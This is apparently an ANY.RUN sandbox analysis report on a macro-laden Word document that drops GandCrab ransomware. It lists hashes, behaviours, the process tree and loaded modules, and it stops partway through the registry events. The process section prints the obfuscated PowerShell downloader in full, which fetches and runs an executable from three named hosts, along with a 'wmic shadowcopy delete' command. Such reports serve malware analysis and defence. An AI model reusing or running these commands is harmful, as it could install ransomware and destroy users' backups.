General Info

File name

dd27b85624cac5b98f2670e1636c0b1787ecb088126d072f58dfb67c76d0fd09.doc

Full analysis
https://app.any.run/tasks/10aab670-7c39-40b3-99dc-69cf886bf76f
Verdict
Malicious activity
Analysis date
3/14/2019, 08:24:20
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

macros

macros-on-open

generated-doc

loader

ransomware

gandcrab

trojan

Indicators:

MIME:
application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info:
Microsoft Word 2007+
MD5

1b737b8b7ce22967d2d4cdedf7dc210d

SHA1

daf8c25d857fbc6e4d9d9b205c98338d54679485

SHA256

dd27b85624cac5b98f2670e1636c0b1787ecb088126d072f58dfb67c76d0fd09

SSDEEP

1536:Wq+PpgnKZXGdythQh/zkq9D4aqFrvlUmz8qtBvNL:1+Da37kq9zqYVqtBvNL

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
120 seconds
Additional time used
60 seconds
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (68.0.3440.106)
  • Google Update Helper (1.3.33.17)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Changes settings of System certificates
  • 6.exe (PID: 2804)
Downloads executable files from the Internet
  • powershell.exe (PID: 2196)
Connects to CnC server
  • 6.exe (PID: 2804)
Application was dropped or rewritten from another process
  • 6.exe (PID: 2804)
Actions looks like stealing of personal data
  • 6.exe (PID: 2804)
Writes file to Word startup folder
  • 6.exe (PID: 2804)
Unusual execution from Microsoft Office
  • WINWORD.EXE (PID: 3352)
Deletes shadow copies
  • 6.exe (PID: 2804)
Starts CMD.EXE for commands execution
  • WINWORD.EXE (PID: 3352)
Executes PowerShell scripts
  • cmd.exe (PID: 3620)
Dropped file may contain instructions of ransomware
  • 6.exe (PID: 2804)
Renames files like Ransomware
  • 6.exe (PID: 2804)
GANDCRAB detected
  • 6.exe (PID: 2804)
Adds / modifies Windows certificates
  • 6.exe (PID: 2804)
Creates files in the user directory
  • powershell.exe (PID: 2196)
  • 6.exe (PID: 2804)
Creates files in the program directory
  • 6.exe (PID: 2804)
Creates files in the Windows directory
  • powershell.exe (PID: 2196)
Executable content was dropped or overwritten
  • powershell.exe (PID: 2196)
Reads the cookies of Mozilla Firefox
  • 6.exe (PID: 2804)
Creates files in the user directory
  • WINWORD.EXE (PID: 3352)
Reads Microsoft Office registry keys
  • WINWORD.EXE (PID: 3352)
Dropped object may contain TOR URL's
  • 6.exe (PID: 2804)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.docm
|   Word Microsoft Office Open XML Format document (with Macro) (53.6%)
.docx
|   Word Microsoft Office Open XML Format document (24.2%)
.zip
|   Open Packaging Conventions container (18%)
.zip
|   ZIP compressed archive (4.1%)
EXIF
ZIP
ZipRequiredVersion:
20
ZipBitFlag:
0x0006
ZipCompression:
Deflated
ZipModifyDate:
1980:01:01 00:00:00
ZipCRC:
0x7df6b578
ZipCompressedSize:
427
ZipUncompressedSize:
1637
ZipFileName:
[Content_Types].xml
XML
Template:
Normal.dotm
TotalEditTime:
null
Pages:
1
Words:
null
Characters:
1
Application:
Microsoft Office Word
DocSecurity:
None
Lines:
1
Paragraphs:
1
ScaleCrop:
No
HeadingPairs
null
null
TitlesOfParts:
null
Company:
null
LinksUpToDate:
No
CharactersWithSpaces:
1
SharedDoc:
No
HyperlinksChanged:
No
AppVersion:
16
Keywords:
null
LastModifiedBy:
Admin
RevisionNumber:
4
CreateDate:
2019:03:13 14:16:00Z
ModifyDate:
2019:03:13 15:23:00Z
XMP
Title:
null
Subject:
null
Creator:
admin
Description:
null

Screenshots

Processes

Total processes
42
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

+
start download and start winword.exe no specs cmd.exe no specs powershell.exe #GANDCRAB 6.exe wmic.exe vssvc.exe no specs
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
3352
CMD
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\dd27b85624cac5b98f2670e1636c0b1787ecb088126d072f58dfb67c76d0fd09.doc"
Path
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft Word
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\apphelp.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\windows\system32\uxtheme.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\winspool.drv
c:\windows\system32\shell32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\program files\common files\microsoft shared\textconv\wpft532.cnv
c:\program files\common files\microsoft shared\textconv\msconv97.dll
c:\program files\common files\microsoft shared\textconv\wpft632.cnv
c:\program files\common files\microsoft shared\textconv\recovr32.cnv
c:\program files\common files\microsoft shared\textconv\wks9pxy.cnv
c:\windows\system32\userenv.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\sxs.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\fm20.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\fm20enu.dll
c:\windows\system32\winmm.dll
c:\windows\system32\windowscodecsext.dll
c:\windows\system32\mscms.dll
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\windows\system32\fontsub.dll
c:\windows\system32\prntvpt.dll
c:\program files\microsoft office\office14\msproof7.dll

PID
3620
CMD
c:\windows\system32\cmd /c set p=power&& set s=shell&& call %p%%s% $TpTHwrjVG = '$Xt6IXVHy = new-obj-658393886-16253271700ect -com-658393886-16253271700obj-658393886-16253271700ect wsc-658393886-16253271700ript.she-658393886-16253271700ll;$XdNivabeu = new-object sys-658393886-16253271700tem.net.web-658393886-16253271700client;$JgUosZV = new-object random;$aSBDE = \"-658393886-16253271700h-658393886-16253271700t-658393886-16253271700t-658393886-16253271700p-658393886-16253271700://nagiah.website/word.exe,-658393886-16253271700h-658393886-16253271700t-658393886-16253271700t-658393886-16253271700p-658393886-16253271700://mobilecontractoffers.co.uk/public/word.exe,-658393886-16253271700h-658393886-16253271700t-658393886-16253271700t-658393886-16253271700p-658393886-16253271700://mobilessavingdeals.co.uk/database/word.exe\".spl-658393886-16253271700it(\",\");$o4jRc2Yx = $JgUosZV.nex-658393886-16253271700t(1, 65536);$V8GNV = \"c:\win-658393886-16253271700dows\tem-658393886-16253271700p\6.ex-658393886-16253271700e\";for-658393886-16253271700each($rWx2E in $aSBDE){try{$XdNivabeu.dow-658393886-16253271700nlo-658393886-16253271700adf-658393886-16253271700ile($rWx2E.ToS-658393886-16253271700tring(), $V8GNV);sta-658393886-16253271700rt-pro-658393886-16253271700cess $V8GNV;break;}catch{}}'.replace('-658393886-16253271700', $kDVZR);$adVuZW = '';iex($TpTHwrjVG);
Path
c:\windows\system32\cmd.exe
Indicators
No indicators
Parent process
WINWORD.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
2196
CMD
powershell $TpTHwrjVG = '$Xt6IXVHy = new-obj-658393886-16253271700ect -com-658393886-16253271700obj-658393886-16253271700ect wsc-658393886-16253271700ript.she-658393886-16253271700ll;$XdNivabeu = new-object sys-658393886-16253271700tem.net.web-658393886-16253271700client;$JgUosZV = new-object random;$aSBDE = \"-658393886-16253271700h-658393886-16253271700t-658393886-16253271700t-658393886-16253271700p-658393886-16253271700://nagiah.website/word.exe,-658393886-16253271700h-658393886-16253271700t-658393886-16253271700t-658393886-16253271700p-658393886-16253271700://mobilecontractoffers.co.uk/public/word.exe,-658393886-16253271700h-658393886-16253271700t-658393886-16253271700t-658393886-16253271700p-658393886-16253271700://mobilessavingdeals.co.uk/database/word.exe\".spl-658393886-16253271700it(\",\");$o4jRc2Yx = $JgUosZV.nex-658393886-16253271700t(1, 65536);$V8GNV = \"c:\win-658393886-16253271700dows\tem-658393886-16253271700p\6.ex-658393886-16253271700e\";for-658393886-16253271700each($rWx2E in $aSBDE){try{$XdNivabeu.dow-658393886-16253271700nlo-658393886-16253271700adf-658393886-16253271700ile($rWx2E.ToS-658393886-16253271700tring(), $V8GNV);sta-658393886-16253271700rt-pro-658393886-16253271700cess $V8GNV;break;}catch{}}'.replace('-658393886-16253271700', $kDVZR);$adVuZW = '';iex($TpTHwrjVG);
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\system32\sxs.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\temp\6.exe
c:\windows\system32\netutils.dll

PID
2804
CMD
"C:\windows\temp\6.exe"
Path
C:\windows\temp\6.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
djsoft.net (c) 2003-2015
Description
Nullable Arsenals Identifier Addpackage
Version
Modules
Image
c:\windows\temp\6.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winspool.drv
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\avifil32.dll
c:\windows\system32\winmm.dll
c:\windows\system32\msacm32.dll
c:\windows\system32\msvfw32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\opengl32.dll
c:\windows\system32\glu32.dll
c:\windows\system32\ddraw.dll
c:\windows\system32\dciman32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\credssp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\psapi.dll
c:\windows\system32\ntkrnlpa.exe
c:\windows\system32\kbdus.dll
c:\windows\system32\mpr.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\netutils.dll
c:\windows\system32\browcli.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\netprofm.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\schannel.dll
c:\windows\system32\secur32.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll

PID
2900
CMD
"C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
Path
C:\Windows\system32\wbem\wmic.exe
Indicators
Parent process
6.exe
User
SYSTEM
Integrity Level
SYSTEM
Exit code
0
Version:
Company
Microsoft Corporation
Description
WMI Commandline Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbem\wmic.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\common files\microsoft shared\office14\msoxmlmf.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll

PID
3448
CMD
C:\Windows\system32\vssvc.exe
Path
C:\Windows\system32\vssvc.exe
Indicators
No indicators
Parent process
––
User
SYSTEM
Integrity Level
SYSTEM
Version:
Company
Microsoft Corporation
Description
Microsoft® Volume Shadow Copy Service
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\vssvc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\atl.dll
c:\windows\system32\ole32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\vssapi.dll
c:\windows\system32\vsstrace.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\clusapi.dll
c:\windows\system32\cryptdll.dll
c:\windows\system32\xolehlp.dll
c:\windows\system32\version.dll
c:\windows\system32\resutils.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\authz.dll
c:\windows\system32\virtdisk.dll
c:\windows\system32\fltlib.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\vss_ps.dll
c:\windows\system32\samlib.dll
c:\windows\system32\es.dll
c:\windows\system32\propsys.dll
c:\windows\system32\catsrvut.dll
c:\windows\system32\mfcsubs.dll

Registry activity

Total events
1584
Read events
1092
Write events
491
Delete events
1

Modification events

PID
Process
Operation
Key
Name
Value
3352
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
3352
WINWORD.EXE
write
